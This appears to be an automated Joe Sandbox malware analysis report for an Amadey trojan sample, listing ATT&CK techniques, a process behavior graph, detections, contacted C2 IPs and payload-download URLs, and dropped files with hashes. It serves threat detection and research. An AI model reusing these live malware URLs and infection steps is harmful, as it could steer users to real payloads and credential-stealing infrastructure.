                      Obfuscated Files or Information                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		12
                      Software Packing                      		1
                      Credential API Hooking                      		2
                      File and Directory Discovery                      		Remote Desktop Protocol4
                      Data from Local System                      		Exfiltration Over Bluetooth1
                      Application Layer Protocol                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Scheduled Task/Job                      		1
                      Services File Permissions Weakness                      		1
                      Registry Run Keys / Startup Folder                      		1
                      File Deletion                      		1
                      Input Capture                      		244
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)1
                      Services File Permissions Weakness                      		1
                      Masquerading                      		2
                      Credentials in Registry                      		431
                      Security Software Discovery                      		Distributed Component Object Model1
                      Credential API Hooking                      		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                      Virtualization/Sandbox Evasion                      		1
                      Credentials In Files                      		11
                      Process Discovery                      		SSH1
                      Input Capture                      		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common111
                      Process Injection                      		Cached Domain Credentials131
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Services File Permissions Weakness                      		DCSync1
                      Remote System Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 764034 Sample: 5GPueTFF2S.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 89 Multi AV Scanner detection for dropped file 2->89 91 7 other signatures 2->91 9 5GPueTFF2S.exe 22 2->9         started        14 gntuud.exe 2->14         started        process3 dnsIp4 61 135.181.10.220 HETZNER-ASDE Germany 9->61 63 88.119.169.157 IST-ASLT Lithuania 9->63 65 8.8.8.8 GOOGLEUS United States 9->65 55 C:\Users\user\AppData\...\nppshell[1].exe, PE32 9->55 dropped 57 C:\ProgramData\75873290272674793137.exe, PE32 9->57 dropped 101 Detected unpacking (creates a PE file in dynamic memory) 9->101 103 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 9->103 105 Self deletion via cmd or bat file 9->105 111 2 other signatures 9->111 16 75873290272674793137.exe 3 9->16         started        20 cmd.exe 1 9->20         started        107 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 14->107 109 Hides threads from debuggers 14->109 file5 signatures6 process7 file8 49 C:\Users\user\AppData\Local\...\gntuud.exe, PE32 16->49 dropped 77 Multi AV Scanner detection for dropped file 16->77 79 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->79 81 Tries to evade analysis by execution special instruction (VM detection) 16->81 83 2 other signatures 16->83 22 gntuud.exe 17 16->22         started        27 conhost.exe 20->27         started        29 timeout.exe 1 20->29         started        signatures9 process10 dnsIp11 59 85.209.135.109 CMCSUS Germany 22->59 51 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 22->51 dropped 53 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 22->53 dropped 93 Multi AV Scanner detection for dropped file 22->93 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->95 97 Creates an undocumented autostart registry key 22->97 99 4 other signatures 22->99 31 rundll32.exe 22->31         started        35 cmd.exe 1 22->35         started        37 schtasks.exe 1 22->37         started        file12 signatures13 process14 dnsIp15 67 192.168.2.4 unknown unknown 31->67 69 System process connects to network (likely due to code injection or exploit) 31->69 71 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 31->71 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 31->73 75 6 other signatures 31->75 39 conhost.exe 35->39         started        41 cmd.exe 1 35->41         started        43 cacls.exe 1 35->43         started        47 4 other processes 35->47 45 conhost.exe 37->45         started        signatures16 process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      5GPueTFF2S.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\75873290272674793137.exe35%ReversingLabsWin32.Trojan.Amadey
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll12%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nppshell[1].exe35%ReversingLabsWin32.Trojan.Amadey
                      C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe35%ReversingLabsWin32.Trojan.Amadey
                      C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll12%ReversingLabs

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.3.5GPueTFF2S.exe.b070000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.5GPueTFF2S.exe.a3f900.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.5GPueTFF2S.exe.a3f900.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://135.181.10.220/update.zip0%Avira URL Cloudsafe
                      http://135.181.10.220:8017600%Avira URL Cloudsafe
                      http://135ple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe0%Avira URL Cloudsafe
                      85.209.135.109/jg94cVd30f/index.php0%Avira URL Cloudsafe
                      http://135.181.10.220/17600%Avira URL Cloudsafe
                      http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe100%Avira URL Cloudmalware
                      http://135.181.10.220:80/update.zip0%Avira URL Cloudsafe
                      http://mikub7zdt5qfxou902vyke64v30mcoy.lnrmxftsk2pynk6vwbpg5s/0%Avira URL Cloudsafe
                      http://135.181.10.220:80%Avira URL Cloudsafe
                      http://135.181.10.220:80https://t.me/vmt001hello2092;open_open0%Avira URL Cloudsafe
                      http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exerO0%Avira URL Cloudsafe
                      http://135.181.10.220:80/update.zipb1ef1c57276c118008692-d06ed635-68f6-4e9a-955c-90ce-806e6f6e69630%Avira URL Cloudsafe
                      http://135.181.10.220:800%Avira URL Cloudsafe
                      http://mIkUB7ZDt5qfxou902VyKe64v30McOy.LnrmXFtSK2Pynk6VWBPG5Sf1w0AavRp1BVjmQQUkh2vmJkxEZO5UQQZNHAms90%Avira URL Cloudsafe
                      http://135.181.10.220/0%Avira URL Cloudsafe
                      http://135.181.10.220/1760jf.0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      85.209.135.109/jg94cVd30f/index.phptrue
                      • Avira URL Cloud: safe
                      		low
                      https://t.me/vmt001false
                        		high
                        http://135.181.10.220:80true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://135.181.10.220/17605GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mikub7zdt5qfxou902vyke64v30mcoy.lnrmxftsk2pynk6vwbpg5s/5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/chrome_newtab5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                          		high
                          http://135ple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=39866407027900499026559352.0.drfalse
                            		high
                            https://sectigo.com/CPS075873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://135.181.10.220:80/update.zip5GPueTFF2S.exe, 00000000.00000002.422509988.00000000005AC000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                              		high
                              http://ocsp.sectigo.com075873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://135.181.10.220:8017605GPueTFF2S.exe, 00000000.00000002.425200801.0000000002A90000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exe5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://search.yahoo.com?fr=crmas_sfpf5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=39866407027900499026559352.0.drfalse
                                  		high
                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                                    		high
                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                                      		high
                                      http://135.181.10.220:80https://t.me/vmt001hello2092;open_open5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://ac.ecosia.org/autocomplete?q=39866407027900499026559352.0.drfalse
                                        		high
                                        https://search.yahoo.com?fr=crmas_sfp5GPueTFF2S.exe, 00000000.00000003.395141799.0000000008DF0000.00000004.00000800.00020000.00000000.sdmp, 39866407027900499026559352.0.drfalse
                                          		high
                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://135.181.10.220/update.zip5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, cred64[1].dll.7.dr, 75873290272674793137.exe.0.dr, gntuud.exe.1.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://135.181.10.220:85GPueTFF2S.exe, 00000000.00000003.385525417.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.431582702.000000000B030000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://135.181.10.220:80/update.zipb1ef1c57276c118008692-d06ed635-68f6-4e9a-955c-90ce-806e6f6e69635GPueTFF2S.exe, 00000000.00000002.422509988.00000000005AC000.00000004.00000010.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://mIkUB7ZDt5qfxou902VyKe64v30McOy.LnrmXFtSK2Pynk6VWBPG5Sf1w0AavRp1BVjmQQUkh2vmJkxEZO5UQQZNHAms95GPueTFF2S.exe, 00000000.00000002.424393747.00000000028CA000.00000040.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=39866407027900499026559352.0.drfalse
                                            		high
                                            http://ripple-wells-2022.net/yzoyoebw6fqrey/nppshell.exerO5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://135.181.10.220/1760jf.5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://135.181.10.220/5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.430008393.0000000008E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            8.8.8.8
                                            		unknownUnited States
                                            		15169GOOGLEUSfalse
                                            135.181.10.220
                                            		unknownGermany
                                            		24940HETZNER-ASDEtrue
                                            88.119.169.157
                                            		unknownLithuania
                                            		61272IST-ASLTfalse
                                            85.209.135.109
                                            		unknownGermany
                                            		33657CMCSUStrue

                                            Private

                                            IP
                                            192.168.2.4

                                            General Information

                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:764034
                                            Start date and time:2022-12-09 10:38:07 +01:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 25s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:5GPueTFF2S.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:23
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.phis.troj.spyw.evad.winEXE@31/16@0/5
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HDC Information:
                                            • Successful, ratio: 49.3% (good quality ratio 47.2%)
                                            • Quality average: 82.3%
                                            • Quality standard deviation: 22.5%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 10
                                            • Number of non-executed functions: 22
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240s for rundll32

                                            Warnings

                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • VT rate limit hit for: 5GPueTFF2S.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            10:40:18API Interceptor1804x Sleep call for process: gntuud.exe modified
                                            10:40:20Task SchedulerRun new task: gntuud.exe path: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            IST-ASLTol3WCa68tx.exeGet hashmaliciousBrowse
                                            • 185.25.51.104
                                            ol3WCa68tx.exeGet hashmaliciousBrowse
                                            • 185.25.51.104
                                            service.dll.dllGet hashmaliciousBrowse
                                            • 213.252.247.122
                                            service.dll.dllGet hashmaliciousBrowse
                                            • 213.252.247.122
                                            nppshell.exeGet hashmaliciousBrowse
                                            • 88.119.169.126
                                            oNCOJiE4q5.exeGet hashmaliciousBrowse
                                            • 213.252.245.221
                                            D0UQB7s9nz.exeGet hashmaliciousBrowse
                                            • 213.252.245.221
                                            ECF263506EFDC83D3911E931D59DCE6B9E9D6FE0C0569.exeGet hashmaliciousBrowse
                                            • 213.252.247.237
                                            Setup.exeGet hashmaliciousBrowse
                                            • 88.119.174.162
                                            b25dQLFUyu.exeGet hashmaliciousBrowse
                                            • 213.252.245.221
                                            eZ6ng53oUq.exeGet hashmaliciousBrowse
                                            • 213.252.245.221
                                            file.exeGet hashmaliciousBrowse
                                            • 88.119.171.176
                                            hmhcZmeccT.exeGet hashmaliciousBrowse
                                            • 88.119.161.12
                                            hmhcZmeccT.exeGet hashmaliciousBrowse
                                            • 88.119.161.12
                                            vdH2LgUJo6.exeGet hashmaliciousBrowse
                                            • 88.119.171.205
                                            vdH2LgUJo6.exeGet hashmaliciousBrowse
                                            • 88.119.171.205
                                            lnstaIIer .x64.exeGet hashmaliciousBrowse
                                            • 88.119.169.42
                                            2C2CA063FCB3E7B379000F48C48A95AB2CEA2724B2E85.exeGet hashmaliciousBrowse
                                            • 185.25.51.36
                                            3hLKmXFVoC.exeGet hashmaliciousBrowse
                                            • 88.119.169.78
                                            file.exeGet hashmaliciousBrowse
                                            • 88.119.169.89
                                            HETZNER-ASDEfile.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            prog.apkGet hashmaliciousBrowse
                                            • 144.76.58.8
                                            KJEfMLiuRS.exeGet hashmaliciousBrowse
                                            • 88.198.29.97
                                            fg.exeGet hashmaliciousBrowse
                                            • 195.201.57.90
                                            file.exeGet hashmaliciousBrowse
                                            • 95.216.221.253
                                            setup.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            Unl#U0443m_Ve_rssi#U043en.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            Unl#U0443m_Ve_rssi#U043en.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            SetupLauncher..exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            Setup.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            SetupLauncher..exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            vFsYU3btg0.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            p3Q6mW75v7.exeGet hashmaliciousBrowse
                                            • 94.130.179.90
                                            6rowFGzE63.exeGet hashmaliciousBrowse
                                            • 95.217.25.31
                                            file.exeGet hashmaliciousBrowse
                                            • 148.251.234.83
                                            file.exeGet hashmaliciousBrowse
                                            • 95.216.221.253
                                            file.exeGet hashmaliciousBrowse
                                            • 95.216.205.133
                                            6VushxrtvY.exeGet hashmaliciousBrowse
                                            • 94.130.179.90
                                            irQJVScEpr.exeGet hashmaliciousBrowse
                                            • 95.217.124.110
                                            c8#Ub2e4.exeGet hashmaliciousBrowse
                                            • 116.202.6.206

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\39866407027900499026559352

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):94208
                                            Entropy (8bit):1.2880737026424216
                                            Encrypted:false
                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\42740063057692746811967690

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):49152
                                            Entropy (8bit):0.7876734657715041
                                            Encrypted:false
                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\45707745472676257340529648

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                            Category:dropped
                                            Size (bytes):147456
                                            Entropy (8bit):0.47889536469736377
                                            Encrypted:false
                                            SSDEEP:96:MHVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                            MD5:D6648BE90F0B2A39C26D60D499E5EB03
                                            SHA1:69D2F56BBA9264621C0779F5D74B356C3794AFF0
                                            SHA-256:E26A78FA6C8A1C60B67536CCB9A620F69FF4588F50F7F3956E14E438C6E5F9D6
                                            SHA-512:BEF8A8D7391D16444B6347C1F2E07037EE1DF67652910551133919EF59F44C94636971BF602D93087D628A6E38DDF0929CF4C824994B35E6C2376B0B55AD4974
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\66974910856148417682877849

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                            Category:dropped
                                            Size (bytes):28672
                                            Entropy (8bit):0.43613063485556663
                                            Encrypted:false
                                            SSDEEP:12:TLqlUIFnGP6Gkwtwhg4FdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0u9z3:TLqlj1czkwubXYFpFNYcw+6UwcYzHr
                                            MD5:46076967A4692D6323BCBDAD8532DA6A
                                            SHA1:A2C61F0EAECF8C2D126FCF82828808B78291E582
                                            SHA-256:BFA77719DCA9C4C92B38BD8A23C9DD751B82DB0F21620E6937C4F97AECC5536B
                                            SHA-512:B4C03F075B2E4DC527AD25B5D5788BE55D4CBCCA66002884CC75528FC57AF54C494B2219C726999E9A29C5AB05C789DB1412F4A01A8AC61726E2F7B785E77691
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\70342673400662660148807453

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                            Category:dropped
                                            Size (bytes):147456
                                            Entropy (8bit):0.47889536469736377
                                            Encrypted:false
                                            SSDEEP:96:MHVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                            MD5:D6648BE90F0B2A39C26D60D499E5EB03
                                            SHA1:69D2F56BBA9264621C0779F5D74B356C3794AFF0
                                            SHA-256:E26A78FA6C8A1C60B67536CCB9A620F69FF4588F50F7F3956E14E438C6E5F9D6
                                            SHA-512:BEF8A8D7391D16444B6347C1F2E07037EE1DF67652910551133919EF59F44C94636971BF602D93087D628A6E38DDF0929CF4C824994B35E6C2376B0B55AD4974
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\73647430720841230611985631

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):94208
                                            Entropy (8bit):1.2880737026424216
                                            Encrypted:false
                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

